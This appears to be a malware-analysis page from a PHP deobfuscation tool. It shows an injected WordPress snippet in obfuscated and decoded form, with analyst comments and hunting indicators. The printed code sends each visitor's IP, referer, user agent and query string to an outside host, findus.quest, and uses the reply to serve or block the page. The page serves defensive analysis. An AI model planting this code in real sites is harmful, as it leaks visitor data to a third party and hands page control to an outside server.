
PHP deobfuscation, decryption, reconstruction tool

Deobfuscates PHP malware, viruses and tampered code found on WordPress sites back into readable source code.

*Please note that not every obfuscation scheme can be decoded.

The code below has been decoded.

<?php if (!function_exists('x6zr7HRenS')) { function x6zr7HRenS() { $x9w4NS = $_SERVER['SERVER_ADDR']; $xz6COCZ6zO = '127.0.0.1'; if ((!empty($_SERVER['HTTP_CF_CONNECTING_IP'])) && (($_SERVER['HTTP_CF_CONNECTING_IP'])!=$xz6COCZ6zO) && (($_SERVER['HTTP_CF_CONNECTING_IP'])!=($x9w4NS...



Obfuscated PHP code

<?php
 // Analyst note (captured sample, shown as submitted): helper that selects the
 // address later reported as the visitor's IP. It tries CF-Connecting-IP,
 // GEOIP_ADDR, the first entry of X-Forwarded-For, Client-IP, then REMOTE_ADDR,
 // skipping values equal to 127.0.0.1 or SERVER_ADDR. The HTTP_* entries come
 // from request headers, so the reported value is client-supplied.
 if (!function_exists('x6zr7HRenS')) 
 { function x6zr7HRenS() { $x9w4NS = $_SERVER['SERVER_ADDR']; $xz6COCZ6zO = '127.0.0.1'; if ((!empty($_SERVER['HTTP_CF_CONNECTING_IP'])) && (($_SERVER['HTTP_CF_CONNECTING_IP'])!=$xz6COCZ6zO) && (($_SERVER['HTTP_CF_CONNECTING_IP'])!=($x9w4NS))) {$ip=$_SERVER['HTTP_CF_CONNECTING_IP'];} elseif ((!empty($_SERVER['GEOIP_ADDR'])) && (($_SERVER['GEOIP_ADDR'])!=$xz6COCZ6zO)) {$ip=$_SERVER['GEOIP_ADDR'];} elseif ((!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) && (($_SERVER['HTTP_X_FORWARDED_FOR'])!=$xz6COCZ6zO) && (($_SERVER['HTTP_X_FORWARDED_FOR'])!=($x9w4NS))) {$ip=explode(',',$_SERVER['HTTP_X_FORWARDED_FOR'])[0];} elseif ((!empty($_SERVER['HTTP_CLIENT_IP'])) && (($_SERVER['HTTP_CLIENT_IP'])!=$xz6COCZ6zO) && (($_SERVER['HTTP_CLIENT_IP'])!=($x9w4NS))) {$ip=$_SERVER['HTTP_CLIENT_IP'];} else {$ip=$_SERVER['REMOTE_ADDR'];} return $ip; }}
  $ip=x6zr7HRenS(); 
 // Analyst note: returns the request's Referer. When the $_SERVER entry is
 // empty it is refilled from getenv('HTTP_REFERER') before being returned.
 if (!function_exists('truer'))
 { function truer() { if(empty($_SERVER['HTTP_REFERER'])) { $_SERVER['HTTP_REFERER'] = getenv('HTTP_REFERER'); } return $_SERVER['HTTP_REFERER']; }} 
  $ref=truer(); 
 // Analyst note: returns the request's User-Agent, with the same getenv()
 // fallback and write-back into $_SERVER as the Referer helper.
 if (!function_exists('xSNSw2Xye5'))
 { function xSNSw2Xye5() { if(empty($_SERVER['HTTP_USER_AGENT'])) { $_SERVER['HTTP_USER_AGENT'] = getenv('HTTP_USER_AGENT'); } return $_SERVER['HTTP_USER_AGENT']; }} 
  $ua=xSNSw2Xye5(); 
 // Analyst note: main body of the injected snippet. On every page load it
 // POSTs visitor metadata to a remote endpoint and lets the reply decide
 // whether the page is served or the request ends with a 404 status header.
 // $data is the URL-encoded query string of the current request (or empty).
 if ($_SERVER['QUERY_STRING']!=''){ $data = ''.urlencode($_SERVER['QUERY_STRING']).''; } else {$data = '';} 
 // The endpoint is split into fragments so the hostname never appears as one
 // string in the file: $cl0ip.$cl1ip.$cl2ip.$cl3ip gives "findus.quest" and
 // $cl1ip.$cl3ip.'.php' gives "usst.php". $langua is assigned but not used
 // anywhere in this listing.
 $sourcename = 'ch'; $cl0ip = 'find'; $sourceid = 'tds3'; $cl1ip = 'us'; $fd = 'c009333'; $cl2ip = '.que'; $langua = 'na';  $cl3ip = 'st'; 
 $ch = curl_init(); 
 // Certificate verification is switched off for the outbound request.
 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); 
 curl_setopt($ch, CURLOPT_URL, 'https://'.$cl0ip.''.$cl1ip.''.$cl2ip.''.$cl3ip.'/'.$cl1ip.''.$cl3ip.'.php'); 
 curl_setopt($ch, CURLOPT_RETURNTRANSFER,true); 
 // 333-second timeout: the page can block for that long waiting on the reply.
 curl_setopt($ch, CURLOPT_TIMEOUT,333); 
 curl_setopt($ch, CURLOPT_POST, true); 
 // Fields sent: fd (fixed id), ip, ref, ua, data, sourceid, sourcename.
 // ip, ref and ua are concatenated as-is, without URL-encoding.
 curl_setopt($ch, CURLOPT_POSTFIELDS, 'fd='.$fd.'&ip='.$ip.'&ref='.$ref.'&ua='.$ua.'&data='.$data.'&sourceid='.$sourceid.'&sourcename='.$sourcename.''); 
 $ifbot = curl_exec($ch); 
 curl_close($ch); 
 // Any reply not loosely equal to '0' sends the 404 status header and stops
 // the request; a reply of '0' lets the page continue. curl_exec() returning
 // false also compares equal to '0' here, so a failed request falls through.
 if ($ifbot != '0') { exit(header('Status: 404 Not Found')); } else {  } ?>

Decoded (deobfuscated) PHP code

<?php

// Analyst note (decoded malware sample, not legitimate site code): this helper
// chooses the address that is later reported to the remote endpoint as the
// visitor's IP. The function_exists() guard skips the definition when a
// function of this name is already defined.
if (!function_exists('x6zr7HRenS')) {
    function x6zr7HRenS()
    {
        // The server's own address and loopback: candidate values equal to
        // either are skipped (loose != comparison).
        $x9w4NS = $_SERVER['SERVER_ADDR'];
        $xz6COCZ6zO = '127.0.0.1';
        // Candidates in priority order. The HTTP_* entries are populated from
        // request headers, so whatever the client sends is what gets reported.
        if (!empty($_SERVER['HTTP_CF_CONNECTING_IP']) && $_SERVER['HTTP_CF_CONNECTING_IP'] != $xz6COCZ6zO && $_SERVER['HTTP_CF_CONNECTING_IP'] != $x9w4NS) {
            $ip = $_SERVER['HTTP_CF_CONNECTING_IP'];
        // GEOIP_ADDR is only compared against loopback, not SERVER_ADDR.
        } elseif (!empty($_SERVER['GEOIP_ADDR']) && $_SERVER['GEOIP_ADDR'] != $xz6COCZ6zO) {
            $ip = $_SERVER['GEOIP_ADDR'];
        // The comparison is against the whole X-Forwarded-For string, but only
        // the first comma-separated entry is used.
        } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']) && $_SERVER['HTTP_X_FORWARDED_FOR'] != $xz6COCZ6zO && $_SERVER['HTTP_X_FORWARDED_FOR'] != $x9w4NS) {
            $ip = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR'])[0];
        } elseif (!empty($_SERVER['HTTP_CLIENT_IP']) && $_SERVER['HTTP_CLIENT_IP'] != $xz6COCZ6zO && $_SERVER['HTTP_CLIENT_IP'] != $x9w4NS) {
            $ip = $_SERVER['HTTP_CLIENT_IP'];
        } else {
            // Fallback: the peer address of the connection.
            $ip = $_SERVER['REMOTE_ADDR'];
        }
        return $ip;
    }
}
// Runs at include time; $ip ends up in the POST body built further down.
$ip = x6zr7HRenS();
// Analyst note: returns the request's Referer value. If the $_SERVER entry is
// empty it is refilled from getenv('HTTP_REFERER') first, so the function also
// writes to $_SERVER as a side effect.
if (!function_exists('truer')) {
    function truer()
    {
        if (empty($_SERVER['HTTP_REFERER'])) {
            $_SERVER['HTTP_REFERER'] = getenv('HTTP_REFERER');
        }
        return $_SERVER['HTTP_REFERER'];
    }
}
// $ref is sent to the remote endpoint as the "ref" POST field.
$ref = truer();
// Analyst note: returns the request's User-Agent value, refilling the $_SERVER
// entry from getenv('HTTP_USER_AGENT') when it is empty.
if (!function_exists('xSNSw2Xye5')) {
    function xSNSw2Xye5()
    {
        if (empty($_SERVER['HTTP_USER_AGENT'])) {
            $_SERVER['HTTP_USER_AGENT'] = getenv('HTTP_USER_AGENT');
        }
        return $_SERVER['HTTP_USER_AGENT'];
    }
}
// $ua is sent to the remote endpoint as the "ua" POST field.
$ua = xSNSw2Xye5();
// Analyst note: main body of the injected snippet. On every page load it POSTs
// visitor metadata to a remote endpoint and lets the reply decide whether the
// page is served or the request ends with a 404 status header.
// For hunting, the stable indicators in this listing are the endpoint URL and
// the POST field names/values (fd=c009333, sourceid=tds3, sourcename=ch).

// $data: URL-encoded query string of the current request, or empty.
if ($_SERVER['QUERY_STRING'] != '') {
    $data = '' . urlencode($_SERVER['QUERY_STRING']) . '';
} else {
    $data = '';
}
// Leftovers of the original string splitting: the $cl*ip fragments were the
// pieces of the hostname and path, already folded into the URL literal below.
// $langua is assigned but not used anywhere in this listing.
$sourcename = 'ch';
$cl0ip = 'find';
$sourceid = 'tds3';
$cl1ip = 'us';
$fd = 'c009333';
$cl2ip = '.que';
$langua = 'na';
$cl3ip = 'st';
$ch = curl_init();
// Certificate verification is switched off for the outbound request.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
// Remote endpoint contacted on each request (network indicator).
curl_setopt($ch, CURLOPT_URL, "https://findus.quest/usst.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// 333-second timeout: the page can block for that long waiting on the reply.
curl_setopt($ch, CURLOPT_TIMEOUT, 333);
curl_setopt($ch, CURLOPT_POST, true);
// Fields sent: fd (fixed id), ip, ref, ua, data, sourceid, sourcename.
// ip, ref and ua are concatenated as-is, without URL-encoding.
curl_setopt($ch, CURLOPT_POSTFIELDS, "fd=c009333&ip=" . $ip . '&ref=' . $ref . '&ua=' . $ua . '&data=' . $data . '&sourceid=' . $sourceid . '&sourcename=' . $sourcename . '');
$ifbot = curl_exec($ch);
curl_close($ch);
// Any reply not loosely equal to '0' sends the 404 status header and stops the
// request; a reply of '0' lets the page continue. curl_exec() returning false
// also compares equal to '0' here, so a failed request falls through and the
// page renders.
if ($ifbot != '0') {
    exit(header('Status: 404 Not Found'));
} else {
}

